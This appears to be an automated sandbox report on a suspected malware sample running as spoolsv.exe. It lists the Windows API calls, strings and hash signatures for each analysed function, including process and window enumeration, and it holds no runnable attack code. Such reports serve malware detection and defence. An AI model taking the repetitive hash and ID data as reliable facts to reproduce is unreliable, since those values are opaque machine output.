                                                                                                        • API String ID: 3192549508-3939202322
                                                                                                        • Opcode ID: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                                                                        • Instruction ID: 28f28964fb9d555221dd9afa2c9f472c2addcd39150ca2e06b2f53480767bc07
                                                                                                        • Opcode Fuzzy Hash: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                                                                        • Instruction Fuzzy Hash: 14316B70704210AFE320DB25E8A4F2BBBE9EBC8714F95859AE54887251C738FC44CA29
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424AF6
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00024A8C), ref: 00424B33
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B
                                                                                                        • API String ID: 3192549508-3939202322
                                                                                                        • Opcode ID: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                                                                        • Instruction ID: 28f28964fb9d555221dd9afa2c9f472c2addcd39150ca2e06b2f53480767bc07
                                                                                                        • Opcode Fuzzy Hash: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                                                                        • Instruction Fuzzy Hash: 14316B70704210AFE320DB25E8A4F2BBBE9EBC8714F95859AE54887251C738FC44CA29
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042FE6A
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0042FE7B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                        • Opcode ID: f784ab39495907c995ffa88e566a7ccb6084cd2a8e8be5d7caf6e143219bf0f8
                                                                                                        • Instruction ID: d05478c2365554a824d123d6fbb6e33ff000ae425a02c21146f90fc1f8f592d2
                                                                                                        • Opcode Fuzzy Hash: f784ab39495907c995ffa88e566a7ccb6084cd2a8e8be5d7caf6e143219bf0f8
                                                                                                        • Instruction Fuzzy Hash: E5D05EB03033214AD3216BA4B981F2F22A48B18304BC2143FA50095333DF7C880D931C
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042FE6A
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0042FE7B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                        • Opcode ID: 410407b10a4238802ec79950a7a5b9178a1e1f7834c8fb41c023dae878659a17
                                                                                                        • Instruction ID: d05478c2365554a824d123d6fbb6e33ff000ae425a02c21146f90fc1f8f592d2
                                                                                                        • Opcode Fuzzy Hash: 410407b10a4238802ec79950a7a5b9178a1e1f7834c8fb41c023dae878659a17
                                                                                                        • Instruction Fuzzy Hash: E5D05EB03033214AD3216BA4B981F2F22A48B18304BC2143FA50095333DF7C880D931C
                                                                                                        APIs
                                                                                                        • FindWindowA.USER32(00000000,?), ref: 004E6F81
                                                                                                          • Part of subcall function 004CF5C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004E6F32
                                                                                                          • Part of subcall function 004CF608: Process32Next.KERNEL32(00000000,?), ref: 004CF619
                                                                                                        • EnumWindows.USER32(004E6C44,?), ref: 004E70AC
                                                                                                          • Part of subcall function 004CF5E8: Process32First.KERNEL32(00000000,00000128), ref: 004CF5F9
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004E709E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcess32$CreateEnumFindFirstNextSnapshotToolhelp32WindowWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 180456925-0
                                                                                                        • Opcode ID: bce857874febc9ef65dca1d5fc0882558fd2a8988de3f1e326e1dcf040138ab3
                                                                                                        • Instruction ID: 72b661b911529101ae542200eb1df53ac65a5c9b4dd6d11e1212abbbfab87a01
                                                                                                        • Opcode Fuzzy Hash: bce857874febc9ef65dca1d5fc0882558fd2a8988de3f1e326e1dcf040138ab3
                                                                                                        • Instruction Fuzzy Hash: A9A1B2347003598BCB21EF5AD881BEFB3B6EF54359F5045AAE80497345DB3CEE458A88
                                                                                                        APIs
                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00431F63
                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00431F7F
                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00431FF6
                                                                                                        • VariantClear.OLEAUT32(?), ref: 0043201F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                        • String ID:
                                                                                                        • API String ID: 920484758-0
                                                                                                        • Opcode ID: 2feee447eab3e52265c8b21dfcf0193c0ec4a2ec98dec2816468c90f8f6c25a7
                                                                                                        • Instruction ID: f3952d494a17d4f816fc107e6549c8048cd253aa9e54a2e5d839202b9fdd8af3
                                                                                                        • Opcode Fuzzy Hash: 2feee447eab3e52265c8b21dfcf0193c0ec4a2ec98dec2816468c90f8f6c25a7
                                                                                                        • Instruction Fuzzy Hash: 45411E75A0021D9FCB61DB59CC91BC9B3BCAF4C314F0051DAE549A7222DB38AF858F58
                                                                                                        APIs
                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                                                                        • GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3990497365-0
                                                                                                        • Opcode ID: ca07ffa398e0464888b7d57e11494c3409e02489f04d24f3075b4b0116595085
                                                                                                        • Instruction ID: 0850e4095803b7705c879a3a56f47181736bc11e0145708a7747c2fb4996507a
                                                                                                        • Opcode Fuzzy Hash: ca07ffa398e0464888b7d57e11494c3409e02489f04d24f3075b4b0116595085
                                                                                                        • Instruction Fuzzy Hash: E641E270B002689FDB11DB59DC85BDEB7F9AB48304F8440EAA508E7251D7789F88CF59
                                                                                                        APIs
                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                                                                        • GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3990497365-0
                                                                                                        • Opcode ID: 71d793b9a51522d017f2b3ebce7c07d421730b79dde85717fac32f14e717e1d5
                                                                                                        • Instruction ID: 0850e4095803b7705c879a3a56f47181736bc11e0145708a7747c2fb4996507a
                                                                                                        • Opcode Fuzzy Hash: 71d793b9a51522d017f2b3ebce7c07d421730b79dde85717fac32f14e717e1d5
                                                                                                        • Instruction Fuzzy Hash: E641E270B002689FDB11DB59DC85BDEB7F9AB48304F8440EAA508E7251D7789F88CF59
                                                                                                        APIs
                                                                                                        • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0042F82E
                                                                                                        • GetThreadLocale.KERNEL32 ref: 0042F75E
                                                                                                          • Part of subcall function 0042F6BC: GetCPInfo.KERNEL32(00000000,?), ref: 0042F6D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocaleStringThreadType
                                                                                                        • String ID:
                                                                                                        • API String ID: 1505017576-0
                                                                                                        • Opcode ID: fe60cc85a5425291f99d297785c3bac38146f42b73dfedf89e738308dbd7c1f2
                                                                                                        • Instruction ID: 2d92115c582512948cd79db13d8c7576cb92c2252ee0582f1964dcb12c82ecca
                                                                                                        • Opcode Fuzzy Hash: fe60cc85a5425291f99d297785c3bac38146f42b73dfedf89e738308dbd7c1f2
                                                                                                        • Instruction Fuzzy Hash: F03149217813A98AD7109765BC013E67BE4EB61304FC480BFD544CB3D1EBB9484DEB9A
                                                                                                        APIs
                                                                                                        • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0042F82E
                                                                                                        • GetThreadLocale.KERNEL32 ref: 0042F75E
                                                                                                          • Part of subcall function 0042F6BC: GetCPInfo.KERNEL32(00000000,?), ref: 0042F6D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocaleStringThreadType
                                                                                                        • String ID:
                                                                                                        • API String ID: 1505017576-0
                                                                                                        • Opcode ID: 5526e12bd0eb839895e88b911c20090cfbd127ba69cb6f86209690220019ef66
                                                                                                        • Instruction ID: 2d92115c582512948cd79db13d8c7576cb92c2252ee0582f1964dcb12c82ecca
                                                                                                        • Opcode Fuzzy Hash: 5526e12bd0eb839895e88b911c20090cfbd127ba69cb6f86209690220019ef66
                                                                                                        • Instruction Fuzzy Hash: F03149217813A98AD7109765BC013E67BE4EB61304FC480BFD544CB3D1EBB9484DEB9A
                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 0043E8A3
                                                                                                        • LoadResource.KERNEL32(?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8BD
                                                                                                        • SizeofResource.KERNEL32(?,0043E930,?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8D7
                                                                                                        • LockResource.KERNEL32(0043E5F4,00000000,?,0043E930,?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                        • String ID:
                                                                                                        • API String ID: 3473537107-0
                                                                                                        • Opcode ID: d1ac32caae1db41a845a1abc366ddd52a8dc75b1c6d3fb84acc03b658d8a3728
                                                                                                        • Instruction ID: 1ca1a7a9c485ca756b6cf2f32b2eaf6a8b809140a0052c2abd4bb8ac9ed98deb
                                                                                                        • Opcode Fuzzy Hash: d1ac32caae1db41a845a1abc366ddd52a8dc75b1c6d3fb84acc03b658d8a3728
                                                                                                        • Instruction Fuzzy Hash: C8F06DB2606614AF5708EEAEA881D5B77DCDE88364720016FF918C7246DA39DD0183BC
                                                                                                        APIs
                                                                                                        • GlobalHandle.KERNEL32 ref: 00428CD3
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00428CDA
                                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00428CDF
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00428CE5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocHandleLockUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167344118-0
                                                                                                        • Opcode ID: edb2d445b92f6ada92e558fdefc9802c95ff9a4c9d9968bd340d16882f3fbd4f
                                                                                                        • Instruction ID: d653ff63ed22f6af050254ba5540b1362e96b0375665dbbf2afb4746ab74a42f
                                                                                                        • Opcode Fuzzy Hash: edb2d445b92f6ada92e558fdefc9802c95ff9a4c9d9968bd340d16882f3fbd4f
                                                                                                        • Instruction Fuzzy Hash: 44B002D4B922307DB90433B6EC0BD3F115C9D947097C44A5E7500D2086DC7D9C22407D
                                                                                                        APIs
                                                                                                        • GlobalHandle.KERNEL32 ref: 00428CD3
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00428CDA
                                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00428CDF
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00428CE5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocHandleLockUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2167344118-0
                                                                                                        • Opcode ID: 9d486adaf99c31d1bb0b9bdc296577990bf99d711a1a41faa7c6392ece96ab7e
                                                                                                        • Instruction ID: 1176041c58d3c6c4e80ae864809d48ff9bb0580384c2a0d59c617645fccee574
                                                                                                        • Opcode Fuzzy Hash: 9d486adaf99c31d1bb0b9bdc296577990bf99d711a1a41faa7c6392ece96ab7e
                                                                                                        • Instruction Fuzzy Hash: 2FB009D4A922307CB90433B2EC0BE3F211CAC9470A7C48A8E7500E2086DC7DA822807E
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00424EFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B
                                                                                                        • API String ID: 3192549508-3939202322
                                                                                                        • Opcode ID: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                                                                        • Instruction ID: bfba1fbf0b618b7186db92fc86f7426f612593a5d895cc110b2475d7b5f2d65f
                                                                                                        • Opcode Fuzzy Hash: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                                                                        • Instruction Fuzzy Hash: 2331A0253046218AF7248A18F584B67B750FBD5311FE78A17D4068B755C72CDC83AB1F
                                                                                                        APIs
                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00424EFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID: (B$<"B
                                                                                                        • API String ID: 3192549508-3939202322
                                                                                                        • Opcode ID: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                                                                        • Instruction ID: bfba1fbf0b618b7186db92fc86f7426f612593a5d895cc110b2475d7b5f2d65f
                                                                                                        • Opcode Fuzzy Hash: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                                                                        • Instruction Fuzzy Hash: 2331A0253046218AF7248A18F584B67B750FBD5311FE78A17D4068B755C72CDC83AB1F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PR$ SE$4$W
                                                                                                        • API String ID: 0-2834725127
                                                                                                        • Opcode ID: c869601e843fd4a9053239925d837b04ac79045f6dc017caac2b4b0226e989b1
                                                                                                        • Instruction ID: de84d66766f4911dbb4cb6dd5687d3048455578843a01c8ac6cd267dfc716551
                                                                                                        • Opcode Fuzzy Hash: c869601e843fd4a9053239925d837b04ac79045f6dc017caac2b4b0226e989b1
                                                                                                        • Instruction Fuzzy Hash: C0F1FAB1901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF59
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RO$C$Once$Start
                                                                                                        • API String ID: 0-2962527757
                                                                                                        • Opcode ID: 576ef00e4965bd863bd0c8463575abd232164b8b12d487e1d680568194e07922
                                                                                                        • Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
                                                                                                        • Opcode Fuzzy Hash: 576ef00e4965bd863bd0c8463575abd232164b8b12d487e1d680568194e07922
                                                                                                        • Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD2A
                                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD30
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                        • String ID: yyyy
                                                                                                        • API String ID: 3303714858-3145165042
                                                                                                        • Opcode ID: 95cf78252dcca114926722424231843ec1152af77ae94dda4d8386d40c50ed3e
                                                                                                        • Instruction ID: 2ee025c3a2bb4f669bd4ad2b38ae6b35f1fd15e103c714e190e08be0474730e4
                                                                                                        • Opcode Fuzzy Hash: 95cf78252dcca114926722424231843ec1152af77ae94dda4d8386d40c50ed3e
                                                                                                        • Instruction Fuzzy Hash: 88217478710528ABD710EB69E882AEEB7B8EF48700F90407BB805D7351D6389E40C76D
                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD2A
                                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0042CD82), ref: 0042CD30
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                        • String ID: yyyy
                                                                                                        • API String ID: 3303714858-3145165042
                                                                                                        • Opcode ID: 41ff6faea25a9793f4e21caa415adeddb5ce30ded2cdd2e055cbadd807ed2bc5
                                                                                                        • Instruction ID: 2ee025c3a2bb4f669bd4ad2b38ae6b35f1fd15e103c714e190e08be0474730e4
                                                                                                        • Opcode Fuzzy Hash: 41ff6faea25a9793f4e21caa415adeddb5ce30ded2cdd2e055cbadd807ed2bc5
                                                                                                        • Instruction Fuzzy Hash: 88217478710528ABD710EB69E882AEEB7B8EF48700F90407BB805D7351D6389E40C76D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
